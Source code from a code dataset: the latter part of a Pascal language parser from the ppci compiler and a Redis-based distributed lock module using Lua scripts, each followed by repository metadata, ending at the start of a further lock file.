self.consume(")")
# print("TODO", args)
# TODO: use args for ??
self.consume(";")
self.logger.debug("Parsing program %s", name.val)
scope = self.enter_scope()
program = symbols.Program(name.val, scope, name.loc)
main_code = self.parse_block()
program.main_code = main_code
self.consume(".")
self.consume("EOF")
return program
def parse_block(self):
""" Parse a block.
A block being constants, types, variables and statements.
"""
# Parse labels:
if self.has_consumed("label"):
labels = []
label = self.consume("NUMBER")
labels.append(label)
while self.has_consumed(","):
label = self.consume("NUMBER")
labels.append(label)
self.consume(";")
# Handle a toplevel construct
if self.peek == "const":
self.parse_constant_definitions()
if self.peek == "type":
self.parse_type_definitions()
if self.peek == "var":
self.parse_variable_declarations()
if self.peek == "procedure" or self.peek == "function":
self.parse_function_declarations()
return self.parse_compound_statement()
def parse_constant_definitions(self):
""" Parse constant definitions.
This has the form:
'const'
'ID' '=' expr;
'ID' '=' expr;
"""
self.consume("const")
while self.peek == "ID":
name = self.consume("ID")
self.consume("=")
val = self.parse_expression()
self.consume(";")
# TODO: evaluate expression?
# This might not be needed, we can evaluate later on?
typ = val.typ
constant = symbols.Constant(name.val, typ, val, name.loc)
self.add_symbol(constant)
# def eval_const_expr(self, expr):
# """ Evaluate constant expression. """
# pass
def parse_uses(self):
""" Parse import construct """
self.consume("uses")
self.consume("ID").val
# self.mod.imports.append(name)
self.consume(";")
def parse_designator(self):
""" A designator designates an object with a name. """
name = self.consume("ID")
# Look it up!
if self.current_scope.has_symbol(name.val):
symbol = self.current_scope.get_symbol(name.val)
return symbol, name.loc
else:
self.error("Unknown identifier {}".format(name.val), name.loc)
def parse_id_sequence(self):
""" Parse one or more identifiers seperated by ',' """
ids = [self.parse_id()]
while self.has_consumed(","):
ids.append(self.parse_id())
return ids
def parse_id(self):
return self.consume("ID")
# Type system
def parse_type_spec(self, packed=False):
""" Parse type specification.
This can be any type, from record to ordinal or boolean.
"""
# Parse the first part of a type spec:
if self.peek == "record":
typ = self.parse_record_type_definition(packed)
elif self.peek == "packed":
location = self.consume("packed").loc
if packed:
self.error("Duplicate packed indicator", loc=location)
else:
typ = self.parse_type_spec(packed=True)
elif self.peek == "array":
typ = self.parse_array_type_definition(packed)
elif self.peek == "set":
typ = self.parse_set_type_definition(packed)
elif self.peek == "file":
location = self.consume("file")
self.consume("of")
component_type = self.parse_type_spec()
typ = types.FileType(component_type, location)
elif self.peek == "(":
typ = self.parse_enum_type_definition()
elif self.peek == "@" or self.peek == "^":
# Pointer!
# TODO: move this to lexer?
if self.peek == "@":
location = self.consume("@").loc
else:
location = self.consume("^").loc
pointed_type = self.parse_type_spec()
typ = types.PointerType(pointed_type)
else:
typ = self.parse_ordinal_type()
return typ
def parse_record_type_definition(self, packed):
""" Parse record type description.
"""
location = self.consume("record").loc
fields = self.parse_record_type_definition_field_list()
self.consume("end")
typ = types.RecordType(fields, location)
return typ
def parse_record_type_definition_field_list(self):
if self.peek == "ID":
fields = self.parse_record_fixed_list()
if self.peek == "case":
variant = self.parse_record_variant()
fields.append(variant)
else:
variant = None
elif self.peek == "case":
fields = [self.parse_record_variant()]
else:
fields = []
return fields
def parse_record_fixed_list(self):
""" Parse fixed parts of a record type definition. """
fields = []
# Fixed fields part:
while self.peek == "ID":
identifiers = self.parse_id_sequence()
self.consume(":")
field_typ = self.parse_type_spec()
for identifier in identifiers:
fields.append(
types.RecordField(
identifier.val, field_typ, identifier.loc
)
)
# Loop until no more ';' found
if self.peek == ";":
self.consume(";")
else:
break
return fields
def parse_record_variant(self):
""" Parse case .. of part. """
location = self.consume("case").loc
if self.peek == "ID":
tag_field = self.consume("ID").val
self.consume(":")
else:
tag_field = None
tag_type = self.parse_type_spec()
self.consume("of")
variants = []
while True:
variant_values = self.parse_expression_list()
self.consume(":")
self.consume("(")
variant_fields = self.parse_record_type_definition_field_list()
self.consume(")")
variants.append((variant_values, variant_fields))
if self.peek == ";":
self.consume(";")
else:
break
variant = types.RecordVariant(tag_field, tag_type, variants, location)
return variant
def parse_array_type_definition(self, packed):
location = self.consume("array").loc
if self.has_consumed("["):
array_dimensions = self.parse_one_or_more(self.parse_ordinal_type, ',')
self.consume("]")
else:
self.error("Expected array size definition")
self.consume("of")
array_element_type = self.parse_type_spec()
typ = types.ArrayType(
array_element_type, array_dimensions, packed, location
)
return typ
def parse_set_type_definition(self, packed):
location = self.consume("set")
self.consume("of")
set_type = self.parse_type_spec()
typ = types.SetType(set_type, location)
return typ
def parse_ordinal_type(self):
if self.peek == "ID":
# The type is identified by an identifier:
symbol, location = self.parse_designator()
if isinstance(symbol, symbols.DefinedType):
typ = symbol.typ
else:
lower_bound = symbol
self.consume("..")
upper_bound = self.parse_expression()
typ = types.SubRange(lower_bound, upper_bound, location)
else:
lower_bound = self.parse_expression()
location = self.consume("..").loc
upper_bound = self.parse_expression()
typ = types.SubRange(lower_bound, upper_bound, location)
return typ
def parse_enum_type_definition(self):
""" Parse enumerated type definition.
This looks like:
colors = (red, green, blue)
"""
location = self.consume("(").loc
identifiers = self.parse_id_sequence()
self.consume(")")
values = []
typ = types.EnumType(values, location)
for value, identifier in enumerate(identifiers):
enum_value = symbols.EnumValue(
identifier.val, typ, value, identifier.loc
)
self.add_symbol(enum_value)
values.append(enum_value)
return typ
def parse_type_definitions(self):
""" Parse type definitions.
These have the form:
'type'
'ID' '=' type-spec ';'
'ID' '=' type-spec ';'
...
"""
self.consume("type")
while self.peek == "ID":
typename = self.consume("ID")
self.consume("=")
newtype = self.parse_type_spec()
self.consume(";")
typedef = symbols.DefinedType(typename.val, newtype, typename.loc)
self.add_symbol(typedef)
def parse_variable_declarations(self):
""" Parse variable declarations """
self.consume("var")
variables = []
variables.extend(self.parse_single_variable_declaration())
while self.peek == "ID":
variables.extend(self.parse_single_variable_declaration())
return variables
def parse_single_variable_declaration(self):
""" Parse a single variable declaration line ending in ';' """
names = self.parse_id_sequence()
self.consume(":")
var_type = self.parse_type_spec()
# Initial value:
if self.has_consumed("="):
initial = self.parse_expression()
else:
initial = None
self.consume(";")
# Create variables:
variables = []
for name in names:
var = symbols.Variable(name.val, var_type, initial, name.loc)
variables.append(var)
self.add_symbol(var)
return variables
def parse_function_declarations(self):
""" Parse all upcoming function / procedure definitions """
while self.peek == "function" or self.peek == "procedure":
self.parse_function_def()
def parse_function_def(self):
""" Parse function definition """
if self.peek == "function":
location = self.consume("function").loc
is_function = True
else:
location = self.consume("procedure").loc
is_function = False
subroutine_name = self.consume("ID").val
self.logger.debug("Parsing subroutine %s", subroutine_name)
if self.has_local_symbol(subroutine_name):
subroutine = self.lookup_symbol(subroutine_name)
if is_function:
if not isinstance(subroutine, symbols.Function):
self.error(
"Expected a forward declared function", loc=location
)
else:
if not isinstance(subroutine, symbols.Procedure):
self.error(
"Expected a forward declared procedure", loc=location
)
self.current_scope, backup_scope = (
subroutine.inner_scope,
self.current_scope,
)
self.consume(";")
subroutine.code = self.parse_block()
self.consume(";")
self.current_scope = backup_scope
else:
if is_function:
subroutine = symbols.Function(subroutine_name, location)
else:
subroutine = symbols.Procedure(subroutine_name, location)
self.add_symbol(subroutine)
subroutine.inner_scope = self.enter_scope()
if self.peek == "(":
parameters = self.parse_formal_parameter_list()
for parameter in parameters:
self.add_symbol(parameter)
parameter_types = [p.typ for p in parameters]
else:
parameters = None
parameter_types = []
subroutine.parameters = parameters
if is_function:
self.consume(":")
return_type = self.parse_type_spec()
subroutine.typ = types.FunctionType(
parameter_types, return_type
)
else:
subroutine.typ = types.ProcedureType(parameter_types)
self.consume(";")
if self.peek == "forward":
self.consume("forward")
else:
subroutine.code = self.parse_block()
self.consume(";")
self.leave_scope()
# paramtypes = [p.typ for p in parameters]
# func.typ = types.FunctionType(paramtypes, returntype)
# func.parameters = parameters
# if self.has_consumed(";"):
# func.body = None
# else:
# func.body = self.parse_compound()
def parse_formal_parameter_list(self):
""" Parse format parameters to a subroutine.
These can be immutable values, variables, or
function pointers.
"""
self.consume("(")
parameters = []
while True:
if self.peek == "ID":
identifiers = self.parse_id_sequence()
self.consume(":")
typ = self.parse_type_spec()
for identifier in identifiers:
parameter = symbols.FormalParameter(
identifier.val, typ, identifier.loc
)
parameters.append(parameter)
elif self.peek == "var":
self.consume("var")
identifiers = self.parse_id_sequence()
self.consume(":")
typ = self.parse_type_spec()
for identifier in identifiers:
parameter = symbols.FormalParameter(
identifier.val, typ, identifier.loc
)
parameters.append(parameter)
elif self.peek == "function":
self.consume("function")
name = self.parse_id()
parameter_types = [
p.typ for p in self.parse_formal_parameter_list()
]
self.consume(":")
return_type = self.parse_type_spec()
typ = types.FunctionType(parameter_types, return_type)
parameter = symbols.FormalParameter(name.val, typ, name.loc)
parameters.append(parameter)
elif self.peek == "procedure":
self.consume("procedure")
name = self.parse_id()
if self.peek == "(":
parameter_types = [
p.typ for p in self.parse_formal_parameter_list()
]
else:
parameter_types = []
typ = types.ProcedureType(parameter_types)
parameter = symbols.FormalParameter(name.val, typ, name.loc)
parameters.append(parameter)
else:
self.error("Expected formal parameter!")
if not self.has_consumed(";"):
break
self.consume(")")
return parameters
def parse_statement(self) -> statements.Statement:
""" Determine statement type based on the pending token """
if self.peek == "if":
statement = self.parse_if_statement()
elif self.peek == "while":
statement = self.parse_while()
elif self.peek == "repeat":
statement = self.parse_repeat()
elif self.peek == "for":
statement = self.parse_for()
elif self.peek == "goto":
statement = self.parse_goto()
elif self.peek == "case":
statement = self.parse_case_of()
elif self.peek == "return":
statement = self.parse_return()
elif self.peek == "begin":
statement = self.parse_compound_statement()
elif self.peek == "end":
statement = statements.Empty()
elif self.peek == ";":
self.consume(";")
statement = statements.Empty()
elif self.peek == "with":
statement = self.parse_with_statement()
elif self.peek == "ID":
symbol, location = self.parse_designator()
if isinstance(symbol.typ, types.ProcedureType):
statement = self.parse_procedure_call(symbol, location)
else: # self.peek == ':=':
statement = self.parse_assignment(symbol, location)
# else:
# self.error('Expected assignment or procedure call', loc=location)
elif self.peek == "NUMBER":
# label!
label = self.consume("NUMBER")
self.consume(":")
labeled_statement = self.parse_statement()
statement = statements.Label(
label.val, labeled_statement, label.loc
)
else:
self.error("Expected statement here")
return statement
def parse_procedure_call(self, symbol, location):
""" Procedure call.
This can be either a builtin procedure, or a user
defined procedure. Builtin procedure are somewhat magical
in that they are sort-of-macro-expanded at compile time.
"""
if isinstance(symbol, symbols.BuiltIn):
statement = self.parse_builtin_procedure_call(
symbol.name, location
)
else:
if self.peek == "(":
arguments = self.parse_actual_parameter_list(
symbol.typ.parameter_types
)
else:
arguments = []
statement = statements.ProcedureCall(symbol, arguments, location)
return statement
def parse_builtin_procedure_call(self, func: str, location):
""" Do sort of macro expansion of built-in procedure call. """
if func in ["write", "writeln"]:
if self.peek == "(":
self.consume("(")
calls = self.parse_one_or_more(self.parse_write_arg, ",")
self.consume(")")
else:
calls = []
if func == "writeln":
newline = expressions.Literal("\n", self._char_type, location)
calls.append(("io_print_char", [newline]))
elif func in ["read", "readln"]:
if self.peek == "(":
self.consume("(")
var = self.parse_expression()
if var.typ.is_file and self.peek == ",":
self.consume(",")
var = self.parse_expression()
self.consume(")")
# TODO!
calls = []
else:
# TODO!
calls = []
elif func == "put":
self.consume("(")
var = self.parse_expression()
self.consume(")")
char = self.do_coerce(var, self._char_type)
calls = [("io_print_char", [char])]
elif func in ["rewrite", "reset", "get"]:
self.consume("(")
var = self.parse_expression()
self.consume(")")
self.logger.error("Implement me!")
# TODO!
calls = []
elif func == "new":
self.consume("(")
var = self.parse_expression()
self.consume(")")
# TODO!
calls = []
elif func == "dispose":
self.consume("(")
var = self.parse_expression()
self.consume(")")
# TODO!
calls = []
elif func == "pack":
self.consume("(")
var = self.parse_expression()
self.consume(",")
var = self.parse_expression()
self.consume(",")
var = self.parse_expression()
self.consume(")")
# TODO!
calls = []
elif func == "unpack":
self.consume("(")
var = self.parse_expression()
self.consume(",")
var = self.parse_expression()
self.consume(",")
var = self.parse_expression()
self.consume(")")
# TODO!
calls = []
else: # pragma: no cover
self.not_impl(func)
return statements.BuiltinProcedureCall(calls, location)
def parse_write_arg(self):
arg = self.parse_expression()
if self.has_consumed(":"):
# Only allowed with writeln and friends.
field_width = self.parse_expression()
if self.has_consumed(":"):
frac_digits = self.parse_expression()
else:
# Assume 10 digits field width with integer values
# 20 with real values.
field_width = expressions.Literal(10, self._integer_type, None)
if self.context.equal_types(self._string_type, arg.typ):
call = ("io_print", [arg])
elif arg.typ.is_array and self.context.equal_types(
"char", arg.typ.element_type
):
# TODO: how to handle strings?
call = ("io_print", [arg])
elif arg.typ.is_enum:
# arg = self.do_coerce(arg, self._integer_type)
# call = ("io_print_int", [arg])
# TODO: how is an enum printed?
call = None
elif self.context.equal_types("char", arg.typ):
call = ("io_print_char", [arg])
elif arg.typ.is_file:
# TODO!
call = None
else:
# Default to integer:
arg = self.do_coerce(arg, self._integer_type)
base = expressions.Literal(10, self._integer_type, None)
call = ("write_int", [arg, base, field_width])
# self.error(
# "Expected string, integer or char, got {}".format(arg.typ),
# arg.location,
# )
return call
def parse_assignment(self, symbol, location):
lhs = self.parse_variable_access(symbol, location)
location = self.consume(":=").loc
rhs = self.parse_expression()
return statements.Assignment(lhs, rhs, location)
def parse_if_statement(self):
""" Parse if statement """
location = self.consume("if").loc
condition = self.parse_condition()
self.consume("then")
true_code = self.parse_statement()
if self.has_consumed("else"):
false_code = self.parse_statement()
else:
false_code = statements.Empty()
return statements.If(condition, true_code, false_code, location)
def parse_case_of(self) -> statements.CaseOf:
""" Parse case-of statement """
location = self.consume("case").loc
expression = self.parse_expression()
tha_type = expression.typ
if not isinstance(tha_type, types.IntegerType):
self.error(
"Expected integer type in case-of statement",
loc=expression.location,
)
self.consume("of")
options = []
while self.peek not in ["end", "else"]:
values = [
self.do_coerce(e, tha_type)
for e in self.parse_expression_list()
]
self.consume(":")
statement = self.parse_statement()
options.append((values, statement))
if self.peek == ";":
self.consume(";")
else:
break
# Optional else clause:
if self.peek == "else":
self.consume("else")
default_statement = self.parse_statement()
self.consume(";")
options.append(("else", default_statement))
self.consume("end")
return statements.CaseOf(expression, options, location)
def parse_while(self) -> statements.While:
""" Parses a while statement """
location = self.consume("while").loc
condition = self.parse_condition()
self.consume("do")
statement = self.parse_statement()
return statements.While(condition, statement, location)
def parse_repeat(self):
""" Parses a repeat statement """
location = self.consume("repeat").loc
inner = []
while self.peek != "until":
inner.append(self.parse_statement())
if self.peek == ";":
self.consume(";")
else:
break
code = statements.Compound(inner, location)
self.consume("until")
condition = self.parse_condition()
return statements.Repeat(code, condition, location)
def parse_for(self) -> statements.For:
""" Parse a for statement """
location = self.consume("for").loc
loop_var, _ = self.parse_designator()
assert isinstance(loop_var, symbols.Variable)
self.consume(":=")
start = self.parse_expression()
if self.peek == "to":
self.consume("to")
up = True
else:
self.consume("downto")
up = False
stop = self.parse_expression()
self.consume("do")
statement = self.parse_statement()
return statements.For(loop_var, start, up, stop, statement, location)
def parse_with_statement(self):
location = self.consume("with").loc
record_variables = self.parse_one_or_more(
self.parse_single_with_variable, ","
)
self.consume("do")
inner_statement = self.parse_statement()
for _ in record_variables:
self.leave_scope()
return statements.With(record_variables, inner_statement, location)
def parse_single_with_variable(self):
""" Parse a single with statement variable.
"""
record_ref = self.parse_variable()
if not record_ref.typ.is_record:
self.error(
"Expected variable of record type", loc=record_ref.location,
)
# Enter new scope:
self.enter_scope()
# Enhance scope with record field names:
for field in record_ref.typ.fields:
field_proxy = symbols.RecordFieldProxy(
field.name, field.typ, record_ref.location
)
self.add_symbol(field_proxy)
return record_ref
def parse_goto(self):
location = self.consume("goto").loc
label = self.parse_expression()
return statements.Goto(label, location)
def parse_actual_parameter_list(self, parameter_types):
""" Parse a list of parameters """
location = self.consume("(").loc
expressions = self.parse_expression_list()
self.consume(")")
if len(expressions) != len(parameter_types):
self.error(
"Expected {} parameters, got {}".format(
len(parameter_types), len(expressions)
),
loc=location,
)
parameters = [
self.do_coerce(e, t) for e, t in zip(expressions, parameter_types)
]
return parameters
def parse_return(self) -> statements.Return:
""" Parse a return statement """
loc = self.consume("return").loc
if self.has_consumed(";"):
expr = None
else:
expr = self.parse_expression()
self.consume(";")
return statements.Return(expr, loc)
def parse_compound_statement(self):
""" Parse a compound statement """
location = self.consume("begin").loc
statement_list = self.parse_one_or_more(self.parse_statement, ";")
self.consume("end")
return statements.Compound(statement_list, location)
def parse_variable(self):
""" Parse access to a variable with eventual accessor suffixes. """
symbol, location = self.parse_designator()
return self.parse_variable_access(symbol, location)
def parse_variable_access(self, symbol, location):
""" Process any trailing variable access. """
if not isinstance(
symbol,
(
symbols.Variable,
symbols.Constant,
symbols.EnumValue,
symbols.Function,
symbols.Procedure,
symbols.RecordFieldProxy,
),
):
self.error(
"Expected a variable here, got: {}".format(symbol),
loc=location,
)
lhs = expressions.VariableAccess(symbol, location)
while self.peek in ["[", ".", "^"]:
if self.peek == "[":
# array indexing
location = self.consume("[").loc
indici = self.parse_expression_list()
self.consume("]")
for index in indici:
if not lhs.typ.is_array:
self.error(
"Expected array type, got: {}".format(lhs.typ),
loc=location,
)
array_typ = lhs.typ
# if len(indici) > len(array_typ.dimensions):
# self.error('Too many indici ({}) for array dimensions ({})'.format(len(indici), len(array_typ.dimensions)), loc=location)
indexed_typ = array_typ.indexed(1)
lhs = expressions.Index(
lhs, index, indexed_typ, index.location
)
elif self.peek == ".":
location = self.consume(".").loc
if not lhs.typ.is_record:
self.error(
"Expected record type, got: {}".format(lhs.typ),
loc=location,
)
field_name = self.parse_id().val
if lhs.typ.has_field(field_name):
field = lhs.typ.find_field(field_name)
lhs = expressions.Member(
lhs, field_name, field.typ, location
)
else:
self.error(
"No such field {}".format(field_name), loc=location
)
elif self.peek == "^":
location = self.consume("^").loc
if not lhs.typ.is_pointer:
self.error(
"Expected pointer type, got {}".format(lhs.typ),
loc=location,
)
typ = lhs.typ.ptype
lhs = expressions.Deref(lhs, typ, location)
else:
raise AssertionError("must be [, ^ or .")
return lhs
def parse_expression_list(self):
""" Parse one or more expressions seperated by ',' """
expression_list = self.parse_one_or_more(self.parse_expression, ",")
return expression_list
def parse_condition(self):
expr = self.parse_expression()
self.require_boolean(expr)
return expr
def require_boolean(self, expr):
""" Check the type of expression to be boolean, and raise
an error if not.
"""
if not self.context.equal_types(expr.typ, self._boolean_type):
self.error("Expected boolean value", loc=expr.location)
def parse_expression(self) -> expressions.Expression:
""" Parse a an expression. """
return self.parse_binop_with_precedence(0)
def parse_binop_with_precedence(self, priority) -> expressions.Expression:
""" Parse binary operators using a binding strength.
This is a neat trick to parse expressions without a whole
bunch of similar looking functions for each operator.
We use the concept of binding strength, or priority
to group expressions according to operator precendence.
"""
lhs = self.parse_primary_expression()
while self._should_take(priority):
operator = self.consume()
op = operator.val
location = operator.loc
operator_priority = self.operator_priorities[op]
rhs = self.parse_binop_with_precedence(operator_priority)
if op in ["+", "-", "*", "/", "div", "mod"]: # arithmatic stuff
common_type = self.get_common_type(lhs, rhs, location)
lhs = self.do_coerce(lhs, common_type)
rhs = self.do_coerce(rhs, common_type)
typ = common_type
elif op in ["=", "<>", "<", ">", ">=", "<="]:
common_type = self.get_common_type(lhs, rhs, location)
lhs = self.do_coerce(lhs, common_type)
rhs = self.do_coerce(rhs, common_type)
typ = self._boolean_type
elif op in ["and", "or"]:
self.require_boolean(lhs)
self.require_boolean(rhs)
typ = self._boolean_type
elif op == "in":
# Set in operator..
# TODO: type check!
typ = self._boolean_type
else: # pragma: no cover
raise NotImplementedError(op)
lhs = expressions.Binop(lhs, op, rhs, typ, location)
return lhs
def _should_take(self, prio):
if self.peek in self.operator_priorities:
operator_prio = self.operator_priorities[self.peek]
return operator_prio > prio
else:
return False
operator_priorities = {
"*": 100,
"/": 100,
"div": 100,
"mod": 100,
"+": 80,
"-": 80,
"=": 60,
"<": 60,
">": 60,
"<=": 60,
">=": 60,
"<>": 60,
"in": 55,
"and": 50,
"or": 40,
}
def parse_primary_expression(self) -> expressions.Expression:
""" Literal and parenthesis expression parsing """
if self.peek == "(":
self.consume("(")
expr = self.parse_expression()
self.consume(")")
elif self.peek == "not":
location = self.consume("not").loc
rhs = self.parse_primary_expression()
expr = expressions.Unop("not", rhs, rhs.typ, location)
elif self.peek in ["+", "-"]:
operator = self.consume()
rhs = self.parse_primary_expression()
expr = expressions.Unop(operator.typ, rhs, rhs.typ, operator.loc)
elif self.peek == "NUMBER":
val = self.consume("NUMBER")
expr = expressions.Literal(val.val, self._integer_type, val.loc)
elif self.peek == "REAL":
val = self.consume("REAL")
expr = expressions.Literal(val.val, self._real_type, val.loc)
elif self.peek == "true":
val = self.consume("true")
expr = expressions.Literal(True, self._boolean_type, val.loc)
elif self.peek == "false":
val = self.consume("false")
expr = expressions.Literal(False, self._boolean_type, val.loc)
elif self.peek == "nil":
location = self.consume("nil").loc
typ = types.PointerType(self._integer_type)
expr = expressions.Literal(None, typ, location)
elif self.peek == "STRING":
val = self.consume("STRING")
location = val.loc
text = val.val
typ = self._char_type if len(text) == 1 else self._string_type
expr = expressions.Literal(text, typ, location)
elif self.peek == "ID":
symbol, location = self.parse_designator()
expr = self.parse_function_call(symbol, location)
elif self.peek == "[":
location = self.consume("[").loc
elements = []
if self.peek != "]":
while True:
element = self.parse_expression()
if self.peek == "..":
self.consume("..")
upper = self.parse_expression()
element = (element, upper)
elements.append(element)
if self.peek == ",":
self.consume(",")
else:
break
self.consume("]")
element_type = self._integer_type # TODO! can be other than int?
typ = types.SetType(element_type, location)
expr = expressions.Literal(elements, typ, location)
else:
self.error(
"Expected number, identifier or (expr), got {0}".format(
self.peek
)
)
return expr
def parse_function_call(self, symbol, location):
if isinstance(symbol, symbols.BuiltIn):
expr = self.parse_builtin_function_call(symbol.name, location)
elif self.peek == "(":
if not isinstance(symbol.typ, types.FunctionType):
self.error("Cannot call non-function", loc=location)
args = self.parse_actual_parameter_list(symbol.typ.parameter_types)
expr = expressions.FunctionCall(
symbol, args, symbol.typ.return_type, location
)
else:
expr = self.parse_variable_access(symbol, location)
return expr
def parse_builtin_function_call(self, func, location):
if func == "ord":
self.consume("(")
arg = self.parse_expression()
self.consume(")")
# TODO!
# char and enum allowed here..
# arg = self.do_coerce(arg, self._char_type)
args = [arg]
typ = self._integer_type
elif func == "chr":
self.consume("(")
arg = self.parse_expression()
self.consume(")")
if not arg.typ.is_integer:
self.error("Must be integer type", loc=arg.location)
typ = self._char_type
args = [arg]
elif func == "odd":
self.consume("(")
arg = self.parse_expression()
self.consume(")")
if not arg.typ.is_integer:
self.error("Must be integer type", loc=arg.location)
typ = self._boolean_type
args = [arg]
elif func in ["succ", "pred"]:
self.consume("(")
arg = self.parse_expression()
self.consume(")")
if not (arg.typ.is_integer or arg.typ.is_enum):
self.error("Must be integer or enum type", loc=arg.location)
typ = arg.typ
args = [arg]
elif func in ["trunc", "round"]:
self.consume("(")
arg = self.parse_expression()
self.consume(")")
typ = arg.typ
args = [arg]
elif func in ["sqr", "abs"]:
self.consume("(")
arg = self.parse_expression()
self.consume(")")
if not (arg.typ.is_integer or arg.typ.is_real):
self.error("Must be integer or real type", loc=arg.location)
typ = arg.typ
args = [arg]
elif func in ["sqrt", "sin", "cos", "arctan", "exp", "ln"]:
self.consume("(")
arg = self.parse_expression()
self.consume(")")
arg = self.do_coerce(arg, self._real_type)
typ = self._real_type
args = [arg]
elif func in ["eof", "eoln"]:
self.consume("(")
arg = self.parse_expression()
self.consume(")")
if not arg.typ.is_file:
self.error("Expected a file", loc=arg.location)
# arg = self.do_coerce(arg, self._real_type)
typ = self._boolean_type
args = [arg]
else:
self.not_impl(func)
expr = expressions.BuiltInFunctionCall(func, args, typ, location)
return expr
def parse_one_or_more(self, parse_function, seperator: str):
""" Parse one or more occurences parsed by parse_function
seperated by seperator.
"""
items = []
items.append(parse_function())
while self.has_consumed(seperator):
items.append(parse_function())
return items
def do_coerce(self, expr: expressions.Expression, to_type: types.Type):
""" Try to convert expression into the given type.
expr: the expression value with a certain type
typ: the type that it must be
Raises an error is the conversion cannot be done.
"""
from_type = expr.typ
loc = expr.location
from_type = self.context.get_type(from_type)
to_type = self.context.get_type(to_type)
# Evaluate types from pointer, unsigned, signed to floating point:
if self.context.equal_types(from_type, to_type):
# no cast required
auto_cast = False
elif from_type.is_pointer and to_type.is_pointer:
# Pointers are pointers, no matter the pointed data.
# But a conversion of type is still needed:
auto_cast = True
elif from_type.is_set and to_type.is_set:
# TODO: how to handle sets?
auto_cast = False
elif from_type.is_enum and to_type.is_subrange:
# TODO: do some extra checks?
auto_cast = True
elif isinstance(from_type, types.UnsignedIntegerType) and isinstance(
to_type, types.PointerType
):
# Unsigned integers can be used as pointers without problem
# Signed integers form a problem, because those can be negative
# and thus must be casted explicitly.
auto_cast = True
elif (
isinstance(from_type, types.UnsignedIntegerType)
and isinstance(to_type, types.UnsignedIntegerType)
and from_type.bits <= to_type.bits
):
auto_cast = True
elif (
isinstance(from_type, types.SignedIntegerType)
and isinstance(to_type, types.SignedIntegerType)
and from_type.bits <= to_type.bits
):
auto_cast = True
elif (
isinstance(from_type, types.UnsignedIntegerType)
and isinstance(to_type, types.SignedIntegerType)
and from_type.bits < to_type.bits - 1
):
auto_cast = True
elif (
isinstance(from_type, types.UnsignedIntegerType)
and isinstance(to_type, types.FloatType)
and from_type.bits < to_type.fraction_bits
):
auto_cast = True
elif (
isinstance(from_type, types.SignedIntegerType)
and isinstance(to_type, types.FloatType)
and from_type.bits < to_type.fraction_bits
):
auto_cast = True
elif isinstance(from_type, types.IntegerType) and isinstance(
to_type, types.IntegerType
):
auto_cast = True
elif (
self.context.equal_types(from_type, self._string_type)
and to_type.is_array
):
# TODO: how to handle strings?
auto_cast = True
elif (
from_type.is_function
and len(from_type.parameter_types) == 0
and self.context.equal_types(from_type.return_type, to_type)
):
# Cool automatic invoke function when return type is wanted!
auto_cast = True
expr = expressions.FunctionCall(
expr, [], from_type.return_type, expr.location
)
else:
self.error(
"Cannot use '{}' as '{}'".format(from_type, to_type), loc=loc
)
# Perform the coercion:
if auto_cast:
expr = expressions.TypeCast(to_type, expr, loc)
return expr
def get_common_type(self, a, b, loc):
""" Determine the greatest common type.
This is used for coercing binary operators.
For example:
- int + float -> float
- byte + int -> int
- byte + byte -> byte
- pointer to x + int -> pointer to x
"""
typ_a = self.context.get_type(a.typ)
typ_b = self.context.get_type(b.typ)
# Use a type rank idea to give a type a preference,
# and select the type which is preferred the most.
return max([typ_a, typ_b], key=self._get_type_rank)
def _get_type_rank(self, typ):
if typ.is_real:
return 2000 + typ.bits
elif typ.is_pointer or typ.is_array or typ.is_enum or typ.is_set:
return 1000
elif typ.is_integer:
return 40 + typ.bits
else:
self.not_impl(str(typ))
| {
"repo_name": "windelbouwman/ppci-mirror",
"path": "ppci/lang/pascal/parser.py",
"copies": "1",
"size": "48001",
"license": "bsd-2-clause",
"hash": 3139028104172118500,
"line_mean": 34.7416232316,
"line_max": 147,
"alpha_frac": 0.520593321,
"autogenerated": false,
"ratio": 4.453609203933939,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 1,
"avg_score": 0.00012252278128889566,
"num_lines": 1343
} |
"""A Redis backed distributed global lock
This code uses the formula here:
https://github.com/jeffomatic/redis-exp-lock-js
It provides several improvements over the original version based on:
http://chris-lamb.co.uk/2010/06/07/distributing-locking-python-and-redis/
It provides a few improvements over the one present in the Python redis
library, for example since it utilizes the Lua functionality, it no longer
requires every client to have synchronized time.
"""
# Copyright 2010,2011 Chris Lamb <lamby@debian.org>
import gevent
import uuid
from vkontakte_viomg.utils import global_connection
acquire_lua = """
local result = redis.call('SETNX', KEYS[1], ARGV[1])
if result == 1 then
redis.call('EXPIRE', KEYS[1], ARGV[2])
end
return result"""
release_lua = """
if redis.call('GET', KEYS[1]) == ARGV[1] then
return redis.call('DEL', KEYS[1])
end
return 0
"""
class Lock(object):
def __init__(self, key, expires=60, timeout=10, redis=None):
"""Distributed locking using Redis Lua scripting for CAS operations.
Usage::
with Lock('my_lock'):
print "Critical section"
:param expires: We consider any existing lock older than
``expires`` seconds to be invalid in order to
detect crashed clients. This value must be higher
than it takes the critical section to execute.
:param timeout: If another client has already obtained the lock,
sleep for a maximum of ``timeout`` seconds before
giving up. A value of 0 means we never wait.
:param redis: The redis instance to use if the default global
redis connection is not desired.
"""
self.key = key
self.timeout = timeout
self.expires = expires
if not redis:
redis = global_connection.redis
self.redis = redis
self._acquire_lua = redis.register_script(acquire_lua)
self._release_lua = redis.register_script(release_lua)
self.lock_key = None
def __enter__(self):
self.acquire()
def __exit__(self, exc_type, exc_value, traceback):
self.release()
def acquire(self):
"""Acquire the lock
:returns: Whether the lock was acquired or not
:rtype: bool
"""
self.lock_key = uuid.uuid4().hex
timeout = self.timeout
while timeout >= 0:
if self._acquire_lua(keys=[self.key],
args=[self.lock_key, self.expires]):
return
timeout -= 0.1
if timeout >= 0:
gevent.sleep(0.1)
raise LockTimeout("Timeout while waiting for lock")
def release(self):
"""Release the lock
This only releases the lock if it matches the UUID we think it
should have, to prevent deleting someone else's lock if we
lagged.
"""
if self.lock_key:
self._release_lua(keys=[self.key], args=[self.lock_key])
self.lock_key = None
class LockTimeout(BaseException):
"""Raised in the event a timeout occurs while waiting for a lock"""
| {
"repo_name": "yablochkin/vkontakte-viomg",
"path": "vkontakte_viomg/lock.py",
"copies": "1",
"size": "3261",
"license": "mit",
"hash": -3917200331624689000,
"line_mean": 29.7641509434,
"line_max": 77,
"alpha_frac": 0.6022692426,
"autogenerated": false,
"ratio": 4.133079847908745,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5235349090508745,
"avg_score": null,
"num_lines": null
} |
"""A Redis backed distributed global lock
This lock based mostly on this excellent example:
